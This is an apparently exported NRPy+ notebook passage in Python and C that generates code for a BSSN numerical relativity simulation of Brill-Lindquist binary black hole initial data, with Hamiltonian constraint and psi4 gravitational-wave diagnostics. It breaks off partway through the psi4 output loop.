import BSSN.BrillLindquist as bl def BrillLindquistID(): returnfunction = bl.BrillLindquist() # Now output the Brill-Lindquist initial data to file: with open("BSSN/BrillLindquist.h","w") as file: file.write(bl.returnfunction) # <a id='nrpyccodes'></a> # # # Step 3: Define Functions for Generating C Codes of Needed Quantities \[Back to [top](#toc)\] # $$\label{nrpyccodes}$$ # # <a id='bssnrhs'></a> # # ## Step 3.a: BSSN RHSs \[Back to [top](#toc)\] # $$\label{bssnrhs}$$ # + import BSSN.BSSN_RHSs as rhs import BSSN.BSSN_gauge_RHSs as gaugerhs import time # Set the *covariant*, second-order Gamma-driving shift condition par.set_parval_from_str("BSSN.BSSN_gauge_RHSs::ShiftEvolutionOption", "GammaDriving2ndOrder_Covariant") rhs.BSSN_RHSs() gaugerhs.BSSN_gauge_RHSs() thismodule = __name__ diss_strength = par.Cparameters("REAL", thismodule, "diss_strength", 1e300) # diss_strength must be set in C, and # we set it crazy high to ensure this. alpha_dKOD = ixp.declarerank1("alpha_dKOD") cf_dKOD = ixp.declarerank1("cf_dKOD") trK_dKOD = ixp.declarerank1("trK_dKOD") betU_dKOD = ixp.declarerank2("betU_dKOD","nosym") vetU_dKOD = ixp.declarerank2("vetU_dKOD","nosym") lambdaU_dKOD = ixp.declarerank2("lambdaU_dKOD","nosym") aDD_dKOD = ixp.declarerank3("aDD_dKOD","sym01") hDD_dKOD = ixp.declarerank3("hDD_dKOD","sym01") for k in range(DIM): gaugerhs.alpha_rhs += diss_strength*alpha_dKOD[k] rhs.cf_rhs += diss_strength* cf_dKOD[k] rhs.trK_rhs += diss_strength* trK_dKOD[k] for i in range(DIM): gaugerhs.bet_rhsU[i] += diss_strength* betU_dKOD[i][k] gaugerhs.vet_rhsU[i] += diss_strength* vetU_dKOD[i][k] rhs.lambda_rhsU[i] += diss_strength*lambdaU_dKOD[i][k] for j in range(DIM): rhs.a_rhsDD[i][j] += diss_strength*aDD_dKOD[i][j][k] rhs.h_rhsDD[i][j] += diss_strength*hDD_dKOD[i][j][k] def BSSN_RHSs(): print("Generating C code for BSSN RHSs in "+par.parval_from_str("reference_metric::CoordSystem")+" coordinates.") start = time.time() BSSN_evol_rhss = [ \ 
lhrh(lhs=gri.gfaccess("rhs_gfs","aDD00"),rhs=rhs.a_rhsDD[0][0]), lhrh(lhs=gri.gfaccess("rhs_gfs","aDD01"),rhs=rhs.a_rhsDD[0][1]), lhrh(lhs=gri.gfaccess("rhs_gfs","aDD02"),rhs=rhs.a_rhsDD[0][2]), lhrh(lhs=gri.gfaccess("rhs_gfs","aDD11"),rhs=rhs.a_rhsDD[1][1]), lhrh(lhs=gri.gfaccess("rhs_gfs","aDD12"),rhs=rhs.a_rhsDD[1][2]), lhrh(lhs=gri.gfaccess("rhs_gfs","aDD22"),rhs=rhs.a_rhsDD[2][2]), lhrh(lhs=gri.gfaccess("rhs_gfs","alpha"),rhs=gaugerhs.alpha_rhs), lhrh(lhs=gri.gfaccess("rhs_gfs","betU0"),rhs=gaugerhs.bet_rhsU[0]), lhrh(lhs=gri.gfaccess("rhs_gfs","betU1"),rhs=gaugerhs.bet_rhsU[1]), lhrh(lhs=gri.gfaccess("rhs_gfs","betU2"),rhs=gaugerhs.bet_rhsU[2]), lhrh(lhs=gri.gfaccess("rhs_gfs","cf"), rhs=rhs.cf_rhs), lhrh(lhs=gri.gfaccess("rhs_gfs","hDD00"),rhs=rhs.h_rhsDD[0][0]), lhrh(lhs=gri.gfaccess("rhs_gfs","hDD01"),rhs=rhs.h_rhsDD[0][1]), lhrh(lhs=gri.gfaccess("rhs_gfs","hDD02"),rhs=rhs.h_rhsDD[0][2]), lhrh(lhs=gri.gfaccess("rhs_gfs","hDD11"),rhs=rhs.h_rhsDD[1][1]), lhrh(lhs=gri.gfaccess("rhs_gfs","hDD12"),rhs=rhs.h_rhsDD[1][2]), lhrh(lhs=gri.gfaccess("rhs_gfs","hDD22"),rhs=rhs.h_rhsDD[2][2]), lhrh(lhs=gri.gfaccess("rhs_gfs","lambdaU0"),rhs=rhs.lambda_rhsU[0]), lhrh(lhs=gri.gfaccess("rhs_gfs","lambdaU1"),rhs=rhs.lambda_rhsU[1]), lhrh(lhs=gri.gfaccess("rhs_gfs","lambdaU2"),rhs=rhs.lambda_rhsU[2]), lhrh(lhs=gri.gfaccess("rhs_gfs","trK"), rhs=rhs.trK_rhs), lhrh(lhs=gri.gfaccess("rhs_gfs","vetU0"),rhs=gaugerhs.vet_rhsU[0]), lhrh(lhs=gri.gfaccess("rhs_gfs","vetU1"),rhs=gaugerhs.vet_rhsU[1]), lhrh(lhs=gri.gfaccess("rhs_gfs","vetU2"),rhs=gaugerhs.vet_rhsU[2]) ] import BSSN.BSSN_quantities as Bq Bq.BSSN_basic_tensors() betaU = Bq.betaU BSSN_RHSs_string = fin.FD_outputC("returnstring",BSSN_evol_rhss, params="outCverbose=False",upwindcontrolvec=betaU) end = time.time() print("Finished generating BSSN RHSs in "+str(end-start)+" seconds.") with open("BSSN/BSSN_RHSs.h", "w") as file: file.write(lp.loop(["i2","i1","i0"],["NGHOSTS","NGHOSTS","NGHOSTS"], 
["NGHOSTS+Nxx[2]","NGHOSTS+Nxx[1]","NGHOSTS+Nxx[0]"], ["1","1","1"],["const REAL invdx0 = 1.0/dxx[0];\n"+ "const REAL invdx1 = 1.0/dxx[1];\n"+ "const REAL invdx2 = 1.0/dxx[2];\n"+ "#pragma omp parallel for", " const REAL xx2 = xx[2][i2];", " const REAL xx1 = xx[1][i1];"],"", """ const REAL xx0 = xx[0][i0]; #define ERF(X, X0, W) (0.5 * (erf( ( (X) - (X0) ) / (W) ) + 1.0)) REAL xCart[3]; #include "../CurviBoundaryConditions/xxCart.h" const REAL diss_strength = ERF(sqrt(xCart[0]*xCart[0] + xCart[1]*xCart[1] + xCart[2]*xCart[2]),2.0L,0.17L)*0.99L;\n"""+BSSN_RHSs_string)) # - # <a id='hamconstraint'></a> # # ## Step 3.b: Output C code for Hamiltonian constraint \[Back to [top](#toc)\] # $$\label{hamconstraint}$$ # # Next output the C code for evaluating the Hamiltonian constraint. In the absence of numerical error, this constraint should evaluate to zero. However it does not due to numerical (typically truncation and roundoff) error. We will therefore measure the Hamiltonian constraint violation to gauge the accuracy of our simulation, and, ultimately determine whether errors are dominated by numerical finite differencing (truncation) error as expected. # First register the Hamiltonian as a gridfunction. H = gri.register_gridfunctions("AUX","H") # Then define the Hamiltonian constraint and output the optimized C code. 
import BSSN.BSSN_constraints as bssncon def H(): print("Generating C code for BSSN Hamiltonian in "+par.parval_from_str("reference_metric::CoordSystem")+" coordinates.") bssncon.output_C__Hamiltonian_h(add_T4UUmunu_source_terms=False) # <a id='spinweight'></a> # # ## Step 3.c: Computing $_{-2}Y_{\ell m} (\theta, \phi)$ for all $(\ell,m)$ for $\ell=0$ up to 2 \[Back to [top](#toc)\] # $$\label{spinweight}$$ # # [**Tutorial Module**](Tutorial-SpinWeighted_Spherical_Harmonics.ipynb) import SpinWeight_minus2_SphHarmonics.SpinWeight_minus2_SphHarmonics as swm2 swm2.SpinWeight_minus2_SphHarmonics(maximum_l=2,filename="SpinWeight_minus2_SphHarmonics/SpinWeight_minus2_SphHarmonics.h") # <a id='psi4'></a> # # ## Step 3.d: Output $\psi_4$ \[Back to [top](#toc)\] # $$\label{psi4}$$ # # We output $\psi_4$, assuming Quasi-Kinnersley tetrad of [Baker, Campanelli, Lousto (2001)](https://arxiv.org/pdf/gr-qc/0104063.pdf). # + import BSSN.Psi4_tetrads as BP4t par.set_parval_from_str("BSSN.Psi4_tetrads::TetradChoice","QuasiKinnersley") #par.set_parval_from_str("BSSN.Psi4_tetrads::UseCorrectUnitNormal","True") import BSSN.Psi4 as BP4 BP4.Psi4() psi4r_0pt = gri.register_gridfunctions("AUX","psi4r_0pt") psi4r_1pt = gri.register_gridfunctions("AUX","psi4r_1pt") psi4r_2pt = gri.register_gridfunctions("AUX","psi4r_2pt") psi4i_0pt = gri.register_gridfunctions("AUX","psi4i_0pt") psi4i_1pt = gri.register_gridfunctions("AUX","psi4i_1pt") psi4i_2pt = gri.register_gridfunctions("AUX","psi4i_2pt") def Psi4re(part): print("Generating C code for psi4_re_pt"+str(part)+" in "+par.parval_from_str("reference_metric::CoordSystem")+" coordinates.") start = time.time() fin.FD_outputC("BSSN/Psi4re_pt"+str(part)+"_lowlevel.h", [lhrh(lhs=gri.gfaccess("aux_gfs","psi4r_"+str(part)+"pt"),rhs=BP4.psi4_re_pt[part])], params="outCverbose=False") end = time.time() print("Finished generating psi4_re_pt"+str(part)+" in "+str(end-start)+" seconds.") def Psi4im(part): print("Generating C code for 
psi4_im_pt"+str(part)+" in "+par.parval_from_str("reference_metric::CoordSystem")+" coordinates.") start = time.time() fin.FD_outputC("BSSN/Psi4im_pt"+str(part)+"_lowlevel.h", [lhrh(lhs=gri.gfaccess("aux_gfs","psi4i_"+str(part)+"pt"),rhs=BP4.psi4_im_pt[part])], params="outCverbose=False") end = time.time() print("Finished generating psi4_im_pt"+str(part)+" in "+str(end-start)+" seconds.") # - # <a id='ccodegen'></a> # # # Step 4: Perform Parallelized C Code Generation \[Back to [top](#toc)\] # $$\label{ccodegen}$$ # # Here we call all functions defined in [the above section](#nrpyccodes) in parallel, to greatly expedite C code generation on multicore CPUs. # + import multiprocessing if __name__ == '__main__': ID = multiprocessing.Process(target=BrillLindquistID) RHS = multiprocessing.Process(target=BSSN_RHSs) H = multiprocessing.Process(target=H) Psi4re0 = multiprocessing.Process(target=Psi4re, args=(0,)) Psi4re1 = multiprocessing.Process(target=Psi4re, args=(1,)) Psi4re2 = multiprocessing.Process(target=Psi4re, args=(2,)) Psi4im0 = multiprocessing.Process(target=Psi4im, args=(0,)) Psi4im1 = multiprocessing.Process(target=Psi4im, args=(1,)) Psi4im2 = multiprocessing.Process(target=Psi4im, args=(2,)) ID.start() RHS.start() H.start() Psi4re0.start() Psi4re1.start() Psi4re2.start() Psi4im0.start() Psi4im1.start() Psi4im2.start() ID.join() RHS.join() H.join() Psi4re0.join() Psi4re1.join() Psi4re2.join() Psi4im0.join() Psi4im1.join() Psi4im2.join() # - # <a id='apply_bcs'></a> # # # Step 5: Apply singular, curvilinear coordinate boundary conditions \[Back to [top](#toc)\] # $$\label{apply_bcs}$$ # # Next apply singular, curvilinear coordinate boundary conditions [as documented in the corresponding NRPy+ tutorial notebook](Tutorial-Start_to_Finish-Curvilinear_BCs.ipynb) import CurviBoundaryConditions.CurviBoundaryConditions as cbcs cbcs.Set_up_CurviBoundaryConditions() # <a id='enforce3metric'></a> # # # Step 6: Enforce conformal 3-metric 
$\det{\bar{\gamma}_{ij}}=\det{\hat{\gamma}_{ij}}$ constraint \[Back to [top](#toc)\] # $$\label{enforce3metric}$$ # # Then enforce conformal 3-metric $\det{\bar{\gamma}_{ij}}=\det{\hat{\gamma}_{ij}}$ constraint (Eq. 53 of [<NAME>, and Baumgarte (2018)](https://arxiv.org/abs/1712.07658)), as [documented in the corresponding NRPy+ tutorial notebook](Tutorial-BSSN-Enforcing_Determinant_gammabar_equals_gammahat_Constraint.ipynb). # # Applying curvilinear boundary conditions should affect the initial data at the outer boundary, and will in general cause the $\det{\bar{\gamma}_{ij}}=\det{\hat{\gamma}_{ij}}$ constraint to be violated there. Thus after we apply these boundary conditions, we must always call the routine for enforcing the $\det{\bar{\gamma}_{ij}}=\det{\hat{\gamma}_{ij}}$ constraint: import BSSN.Enforce_Detgammabar_Constraint as EGC EGC.output_Enforce_Detgammabar_Constraint_Ccode() # <a id='mainc'></a> # # # Step 7: `BrillLindquist_Playground.c`: The Main C Code \[Back to [top](#toc)\] # $$\label{mainc}$$ # + # Part P0: Define REAL, set the number of ghost cells NGHOSTS (from NRPy+'s FD_CENTDERIVS_ORDER), # and set the CFL_FACTOR (which can be overwritten at the command line) with open("BSSN/BSSN_Playground_REAL__NGHOSTS__CFL_FACTOR.h", "w") as file: file.write(""" // Part P0.a: Set the number of ghost cells, from NRPy+'s FD_CENTDERIVS_ORDER #define NGHOSTS """+str(int(FD_order/2)+1)+""" // Part P0.b: Set the numerical precision (REAL) to double, ensuring all floating point // numbers are stored to at least ~16 significant digits #define REAL """+REAL+""" // Part P0.c: Set the number of ghost cells, from NRPy+'s FD_CENTDERIVS_ORDER REAL CFL_FACTOR = """+str(CFL_FACTOR)+"""; // Set the CFL Factor. Can be overwritten at command line.""") # + # %%writefile BSSN/BrillLindquist_Playground.c // Step P0: define NGHOSTS and declare CFL_FACTOR. 
#include "BSSN_Playground_REAL__NGHOSTS__CFL_FACTOR.h" // Step P1: Import needed header files #include "stdio.h" #include "stdlib.h" #include "math.h" #include "time.h" #include "stdint.h" // Needed for Windows GCC 6.x compatibility #ifndef M_PI #define M_PI 3.141592653589793238462643383279502884L #endif #ifndef M_SQRT1_2 #define M_SQRT1_2 0.707106781186547524400844362104849039L #endif // Step P2: Set free parameters // Step P2a: Free parameters for the numerical grid // ONLY SinhSpherical used in this module. // SinhSpherical coordinates parameters const REAL AMPL = 300; // Parameter has been updated, compared to B-L test from REB paper (Pg 20 of https://arxiv.org/pdf/1712.07658.pdf) const REAL SINHW = 0.2L; // Parameter has been updated, compared to B-L test from REB paper (Pg 20 of https://arxiv.org/pdf/1712.07658.pdf) //const REAL SINHW = 0.125; // Matches B-L test from REB paper (Pg 20 of https://arxiv.org/pdf/1712.07658.pdf) // Time coordinate parameters const REAL t_final = 275; /* Final time is set so that at t=t_final, * data at the plotted wave extraction radius have not been corrupted * by the approximate outer boundary condition */ // Step P2b: Free parameters for the spacetime evolution const REAL eta = 2.0; // Gamma-driving shift condition parameter. Matches B-L test from REB paper (Pg 20 of https://arxiv.org/pdf/1712.07658.pdf) // Step P3: Implement the algorithm for upwinding. // *NOTE*: This upwinding is backwards from // usual upwinding algorithms, because the // upwinding control vector in BSSN (the shift) // acts like a *negative* velocity. #define UPWIND_ALG(UpwindVecU) UpwindVecU > 0.0 ? 
1.0 : 0.0 // Step P4: Set free parameters for the (Brill-Lindquist) initial data const REAL BH1_posn_x = 0.0,BH1_posn_y = 0.0,BH1_posn_z = +0.25; const REAL BH2_posn_x = 0.0,BH2_posn_y = 0.0,BH2_posn_z = -0.25; //const REAL BH1_posn_x = 0.0,BH1_posn_y = 0.0,BH1_posn_z = +0.05; // SUPER CLOSE //const REAL BH2_posn_x = 0.0,BH2_posn_y = 0.0,BH2_posn_z = -0.05; // SUPER CLOSE const REAL BH1_mass = 0.5,BH2_mass = 0.5; // Step P5: Declare the IDX4(gf,i,j,k) macro, which enables us to store 4-dimensions of // data in a 1D array. In this case, consecutive values of "i" // (all other indices held to a fixed value) are consecutive in memory, where // consecutive values of "j" (fixing all other indices) are separated by // Nxx_plus_2NGHOSTS[0] elements in memory. Similarly, consecutive values of // "k" are separated by Nxx_plus_2NGHOSTS[0]*Nxx_plus_2NGHOSTS[1] in memory, etc. #define IDX4(g,i,j,k) \ ( (i) + Nxx_plus_2NGHOSTS[0] * ( (j) + Nxx_plus_2NGHOSTS[1] * ( (k) + Nxx_plus_2NGHOSTS[2] * (g) ) ) ) #define IDX3(i,j,k) ( (i) + Nxx_plus_2NGHOSTS[0] * ( (j) + Nxx_plus_2NGHOSTS[1] * (k) ) ) // Assuming idx = IDX3(i,j,k). Much faster if idx can be reused over and over: #define IDX4pt(g,idx) ( (idx) + (Nxx_plus_2NGHOSTS[0]*Nxx_plus_2NGHOSTS[1]*Nxx_plus_2NGHOSTS[2]) * (g) ) // Step P6: Set #define's for BSSN gridfunctions. C code generated above #include "../CurviBoundaryConditions/gridfunction_defines.h" #define LOOP_REGION(i0min,i0max, i1min,i1max, i2min,i2max) \ for(int i2=i2min;i2<i2max;i2++) for(int i1=i1min;i1<i1max;i1++) for(int i0=i0min;i0<i0max;i0++) #define LOOP_ALL_GFS_GPS(ii) _Pragma("omp parallel for") \ for(int (ii)=0;(ii)<Nxx_plus_2NGHOSTS_tot*NUM_EVOL_GFS;(ii)++) void xxCart(REAL *xx[3],const int i0,const int i1,const int i2, REAL xCart[3]) { REAL xx0 = xx[0][i0]; REAL xx1 = xx[1][i1]; REAL xx2 = xx[2][i2]; #include "../CurviBoundaryConditions/xxCart.h" } // Step P7: Include basic functions needed to impose curvilinear // parity and boundary conditions. 
#include "../CurviBoundaryConditions/curvilinear_parity_and_outer_boundary_conditions.h"

// Step P8: Include function for enforcing detgammabar constraint.
#include "enforce_detgammabar_constraint.h"

// Step P9: Find the CFL-constrained timestep
// find_timestep(): Return the CFL-limited timestep dt = CFL_FACTOR * ds_min,
// where ds_min is the smallest proper distance between neighboring gridpoints,
// minimized over the grid *interior* only (the LOOP_REGION bounds exclude the
// NGHOSTS-deep ghost zones on every face).
// Inputs: grid extents (incl. ghosts), uniform coordinate spacings dxx[],
//         coordinate arrays xx[], and the CFL factor.
// NOTE(review): the generated header "ds_dirn.h" is assumed to set
// ds_dirn{0,1,2} to the proper-distance elements at (xx0,xx1,xx2) from
// dxx{0,1,2} -- presumably via the reference-metric scale factors; confirm
// against the generated file.
REAL find_timestep(const int Nxx_plus_2NGHOSTS[3],const REAL dxx[3],REAL *xx[3], const REAL CFL_FACTOR) {
  const REAL dxx0 = dxx[0], dxx1 = dxx[1], dxx2 = dxx[2];
  REAL dsmin = 1e38; // Start with a crazy high value... close to the largest number in single precision.
  LOOP_REGION(NGHOSTS,Nxx_plus_2NGHOSTS[0]-NGHOSTS, NGHOSTS,Nxx_plus_2NGHOSTS[1]-NGHOSTS, NGHOSTS,Nxx_plus_2NGHOSTS[2]-NGHOSTS) {
    const REAL xx0 = xx[0][i0], xx1 = xx[1][i1], xx2 = xx[2][i2];
    REAL ds_dirn0, ds_dirn1, ds_dirn2;
#include "ds_dirn.h"
#define MIN(A, B) ( ((A) < (B)) ? (A) : (B) )
    // Set dsmin = MIN(dsmin, ds_dirn0, ds_dirn1, ds_dirn2);
    dsmin = MIN(dsmin,MIN(ds_dirn0,MIN(ds_dirn1,ds_dirn2)));
  }
  // Timestep is the global minimum proper distance scaled by the CFL factor.
  return dsmin*CFL_FACTOR;
}

// Step P10: Declare function necessary for setting up the initial data.
// Step P10.a: Define BSSN_ID() for BrillLindquist initial data #include "BrillLindquist.h" // Step P10.b: Set the generic driver function for setting up BSSN initial data void initial_data(const int Nxx_plus_2NGHOSTS[3],REAL *xx[3], REAL *in_gfs) { #pragma omp parallel for LOOP_REGION(0,Nxx_plus_2NGHOSTS[0], 0,Nxx_plus_2NGHOSTS[1], 0,Nxx_plus_2NGHOSTS[2]) { const int idx = IDX3(i0,i1,i2); BSSN_ID(xx[0][i0],xx[1][i1],xx[2][i2], &in_gfs[IDX4pt(HDD00GF,idx)],&in_gfs[IDX4pt(HDD01GF,idx)],&in_gfs[IDX4pt(HDD02GF,idx)], &in_gfs[IDX4pt(HDD11GF,idx)],&in_gfs[IDX4pt(HDD12GF,idx)],&in_gfs[IDX4pt(HDD22GF,idx)], &in_gfs[IDX4pt(ADD00GF,idx)],&in_gfs[IDX4pt(ADD01GF,idx)],&in_gfs[IDX4pt(ADD02GF,idx)], &in_gfs[IDX4pt(ADD11GF,idx)],&in_gfs[IDX4pt(ADD12GF,idx)],&in_gfs[IDX4pt(ADD22GF,idx)], &in_gfs[IDX4pt(TRKGF,idx)], &in_gfs[IDX4pt(LAMBDAU0GF,idx)],&in_gfs[IDX4pt(LAMBDAU1GF,idx)],&in_gfs[IDX4pt(LAMBDAU2GF,idx)], &in_gfs[IDX4pt(VETU0GF,idx)],&in_gfs[IDX4pt(VETU1GF,idx)],&in_gfs[IDX4pt(VETU2GF,idx)], &in_gfs[IDX4pt(BETU0GF,idx)],&in_gfs[IDX4pt(BETU1GF,idx)],&in_gfs[IDX4pt(BETU2GF,idx)], &in_gfs[IDX4pt(ALPHAGF,idx)],&in_gfs[IDX4pt(CFGF,idx)]); } } // Step P11: Declare function for evaluating Hamiltonian constraint (diagnostic) void Hamiltonian_constraint(const int Nxx[3],const int Nxx_plus_2NGHOSTS[3],const REAL dxx[3], REAL *xx[3], REAL *in_gfs, REAL *aux_gfs) { #include "Hamiltonian.h" } // Step P12: Declare function for evaluating real and imaginary parts of psi4 (diagnostic) void psi4(const int Nxx_plus_2NGHOSTS[3],const int i0,const int i1,const int i2, const REAL dxx[3], REAL *xx[3], REAL *in_gfs, REAL *aux_gfs) { const int idx = IDX3(i0,i1,i2); const REAL xx0 = xx[0][i0]; const REAL xx1 = xx[1][i1]; const REAL xx2 = xx[2][i2]; const REAL invdx0 = 1.0/dxx[0]; const REAL invdx1 = 1.0/dxx[1]; const REAL invdx2 = 1.0/dxx[2]; // REAL psi4_re_pt0,psi4_re_pt1,psi4_re_pt2; { #include "Psi4re_pt0_lowlevel.h" } { #include "Psi4re_pt1_lowlevel.h" } { #include "Psi4re_pt2_lowlevel.h" } // 
REAL psi4_im_pt0,psi4_im_pt1,psi4_im_pt2; { #include "Psi4im_pt0_lowlevel.h" } { #include "Psi4im_pt1_lowlevel.h" } { #include "Psi4im_pt2_lowlevel.h" } // aux_gfs[IDX4pt(PSI4RGF,idx)] = psi4_re_pt0 + psi4_re_pt1 + psi4_re_pt2; // aux_gfs[IDX4pt(PSI4IGF,idx)] = psi4_im_pt0 + psi4_im_pt1 + psi4_im_pt2; } // Step P13: Declare function to evaluate the BSSN RHSs void rhs_eval(const int Nxx[3],const int Nxx_plus_2NGHOSTS[3],const REAL dxx[3], REAL *xx[3], const REAL *in_gfs,REAL *rhs_gfs) { #include "BSSN_RHSs.h" } // main() function: // Step 0: Read command-line input, set up grid structure, allocate memory for gridfunctions, set up coordinates // Step 1: Set up initial data to an exact solution // Step 2: Start the timer, for keeping track of how fast the simulation is progressing. // Step 3: Integrate the initial data forward in time using the chosen RK-like Method of // Lines timestepping algorithm, and output periodic simulation diagnostics // Step 3.a: Output 2D data file periodically, for visualization // Step 3.b: Step forward one timestep (t -> t+dt) in time using // chosen RK-like MoL timestepping algorithm // Step 3.c: If t=t_final, output conformal factor & Hamiltonian // constraint violation to 2D data file // Step 3.d: Progress indicator printing to stderr // Step 4: Free all allocated memory int main(int argc, const char *argv[]) { // Step 0a: Read command-line input, error out if nonconformant if((argc != 4 && argc != 5) || atoi(argv[1]) < NGHOSTS || atoi(argv[2]) < NGHOSTS || atoi(argv[3]) < 2 /* FIXME; allow for axisymmetric sims */) { fprintf(stderr,"Error: Expected three command-line arguments: ./BrillLindquist_Playground Nx0 Nx1 Nx2,\n"); fprintf(stderr,"where Nx[0,1,2] is the number of grid points in the 0, 1, and 2 directions.\n"); fprintf(stderr,"Nx[] MUST BE larger than NGHOSTS (= %d)\n",NGHOSTS); exit(1); } if(argc == 5) { CFL_FACTOR = strtod(argv[4],NULL); if(CFL_FACTOR > 0.5 && atoi(argv[3])!=2) { fprintf(stderr,"WARNING: CFL_FACTOR was set 
to %e, which is > 0.5.\n",CFL_FACTOR); fprintf(stderr," This will generally only be stable if the simulation is purely axisymmetric\n"); fprintf(stderr," However, Nx2 was set to %d>2, which implies a non-axisymmetric simulation\n",atoi(argv[3])); } } // Step 0b: Set up numerical grid structure, first in space... const int Nxx[3] = { atoi(argv[1]), atoi(argv[2]), atoi(argv[3]) }; if(Nxx[0]%2 != 0 || Nxx[1]%2 != 0 || Nxx[2]%2 != 0) { fprintf(stderr,"Error: Cannot guarantee a proper cell-centered grid if number of grid cells not set to even number.\n"); fprintf(stderr," For example, in case of angular directions, proper symmetry zones will not exist.\n"); exit(1); } const int Nxx_plus_2NGHOSTS[3] = { Nxx[0]+2*NGHOSTS, Nxx[1]+2*NGHOSTS, Nxx[2]+2*NGHOSTS }; const int Nxx_plus_2NGHOSTS_tot = Nxx_plus_2NGHOSTS[0]*Nxx_plus_2NGHOSTS[1]*Nxx_plus_2NGHOSTS[2]; #include "xxminmax.h" // Step 0c: Allocate memory for gridfunctions #include "../MoLtimestepping/RK_Allocate_Memory.h" if(NUM_AUX_GFS > NUM_EVOL_GFS) { printf("Error: NUM_AUX_GFS > NUM_EVOL_GFS. Either reduce the number of auxiliary gridfunctions,\n"); printf(" or allocate (malloc) by hand storage for *diagnostic_output_gfs. \n"); exit(1); } // Step 0d: Set up space and time coordinates // Step 0d.i: Set \Delta x^i on uniform grids. REAL dxx[3]; for(int i=0;i<3;i++) dxx[i] = (xxmax[i] - xxmin[i]) / ((REAL)Nxx[i]); // Step 0d.ii: Set up uniform coordinate grids REAL *xx[3]; for(int i=0;i<3;i++) { xx[i] = (REAL *)malloc(sizeof(REAL)*Nxx_plus_2NGHOSTS[i]); for(int j=0;j<Nxx_plus_2NGHOSTS[i];j++) { xx[i][j] = xxmin[i] + ((REAL)(j-NGHOSTS) + (1.0/2.0))*dxx[i]; // Cell-centered grid. } } // Step 0d.iii: Set timestep based on smallest proper distance between gridpoints and CFL factor REAL dt = find_timestep(Nxx_plus_2NGHOSTS, dxx,xx, CFL_FACTOR); //printf("# Timestep set to = %e\n",(double)dt); int N_final = (int)(t_final / dt + 0.5); // The number of iterations in time. //Add 0.5 to account for C rounding down integers. 
REAL out_approx_every_t = 0.2; int N_output_every = (int)(out_approx_every_t*((REAL)N_final)/t_final); // Step 0e: Find ghostzone mappings and parities: gz_map *bc_gz_map = (gz_map *)malloc(sizeof(gz_map)*Nxx_plus_2NGHOSTS_tot); parity_condition *bc_parity_conditions = (parity_condition *)malloc(sizeof(parity_condition)*Nxx_plus_2NGHOSTS_tot); set_up_bc_gz_map_and_parity_conditions(Nxx_plus_2NGHOSTS,xx,dxx,xxmin,xxmax, bc_gz_map, bc_parity_conditions); // Step 1: Set up initial data to an exact solution initial_data(Nxx_plus_2NGHOSTS, xx, y_n_gfs); // Step 1b: Apply boundary conditions, as initial data // are sometimes ill-defined in ghost zones. // E.g., spherical initial data might not be // properly defined at points where r=-1. apply_bcs(Nxx, Nxx_plus_2NGHOSTS, bc_gz_map,bc_parity_conditions,NUM_EVOL_GFS,evol_gf_parity, y_n_gfs); enforce_detgammabar_constraint(Nxx_plus_2NGHOSTS, xx, y_n_gfs); // Step 2: Start the timer, for keeping track of how fast the simulation is progressing. #ifdef __linux__ // Use high-precision timer in Linux. struct timespec start, end; clock_gettime(CLOCK_REALTIME, &start); #else // Resort to low-resolution, standards-compliant timer in non-Linux OSs // http://www.cplusplus.com/reference/ctime/time/ time_t start_timer,end_timer; time(&start_timer); // Resolution of one second... #endif // Step 3: Integrate the initial data forward in time using the chosen RK-like Method of // Lines timestepping algorithm, and output periodic simulation diagnostics for(int n=0;n<=N_final;n++) { // Main loop to progress forward in time. 
/* Step 3.a: Output psi4 spin-weight -2 decomposed data, every N_output_every */ if(n%N_output_every == 0) { #include "../SpinWeight_minus2_SphHarmonics/SpinWeight_minus2_SphHarmonics.h" char filename[100]; //int r_ext_idx = (Nxx_plus_2NGHOSTS[0]-NGHOSTS)/4; for(int r_ext_idx = (Nxx_plus_2NGHOSTS[0]-NGHOSTS)/4; r_ext_idx<(Nxx_plus_2NGHOSTS[0]-NGHOSTS)*0.9;r_ext_idx+=5) { REAL r_ext; { REAL xx0 = xx[0][r_ext_idx]; REAL xx1 = xx[1][1]; REAL xx2 = xx[2][1]; REAL xCart[3]; #include "xxCart.h" r_ext = sqrt(xCart[0]*xCart[0] + xCart[1]*xCart[1] + xCart[2]*xCart[2]); } sprintf(filename,"outPsi4_l2m0-%d-r%.2f.txt",Nxx[0],(double)r_ext); FILE *outPsi4_l2m0; if(n==0) outPsi4_l2m0 = fopen(filename, "w"); else outPsi4_l2m0 = fopen(filename, "a"); REAL Psi4r_0pt_l2m0 = 0.0,Psi4r_1pt_l2m0 = 0.0,Psi4r_2pt_l2m0 = 0.0; REAL Psi4i_0pt_l2m0 = 0.0,Psi4i_1pt_l2m0 = 0.0,Psi4i_2pt_l2m0 = 0.0; LOOP_REGION(r_ext_idx,r_ext_idx+1, NGHOSTS,Nxx_plus_2NGHOSTS[1]-NGHOSTS, NGHOSTS,NGHOSTS+1) { psi4(Nxx_plus_2NGHOSTS, i0,i1,i2, dxx,xx, y_n_gfs, diagnostic_output_gfs); const int idx = IDX3(i0,i1,i2); const REAL th = xx[1][i1]; const REAL ph = xx[2][i2]; // Construct integrand for Psi4 spin-weight s=-2,l=2,m=0 spherical harmonic // Based on http://www.demonstrations.wolfram.com/SpinWeightedSphericalHarmonics/ // we have {}_{s}_Y_{lm} = {}_{-2}_Y_{20} = 1/4 * sqrt(15 / (2*pi)) * sin(th)^2 // Confirm integrand is correct: // Integrate[(1/4 Sqrt[15/(2 \[Pi])] Sin[th]^2) (1/4 Sqrt[15/(2 \[Pi])] Sin[th]^2)*2*Pi*Sin[th], {th, 0, Pi}] // ^^^ equals 1. 
